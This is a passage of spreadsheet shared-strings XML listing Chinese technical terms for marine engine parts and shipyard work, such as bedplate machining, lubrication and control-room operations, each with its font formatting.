    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械导向装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械控制机构工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械千斤顶配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械式油雾监测器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械调节系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械研磨</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械轴承监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械注油润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械转速计布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座，特殊镗孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座、填料函放泄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架铰孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座船艉侧焊接加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座船艉侧机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座底部视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座顶部视图加工图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座割板方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接余量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座后端的提升</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座滑油管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座及机架铣孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座间隙表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座建议书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座前端的提升</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座区域清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座水平调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座特别镗孔图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座调水平</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座泄放主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座与机架铰孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座找正与组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座中间部焊接加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基本模数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基本指南</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础，齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础，交流发电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础，主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础，主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础楔块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基架机加工前视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基架加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基座护栏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>激光及琴弦校中建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>极限继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>急速停车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可换向调距桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>棘齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室，停车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室，组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室操纵盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室控制，安全系统停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室控制，起动，前进，后退</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室控制，停车，起动，前进，后退</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室控制启动，前进，倒车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室控制停车，启动，前进，后退，安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油盘，装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集中润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集装箱船二冲程主机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>几何边界条件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计量泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计时单元总成</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计数继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机控制监测系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(MPS)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机控制监测系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(SPC)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算机控制监测系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(SPO)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计算说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>记录评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术文档</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>望远镜管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加盖法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加盖管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加盖管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加盖环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热棒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热柜控制箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
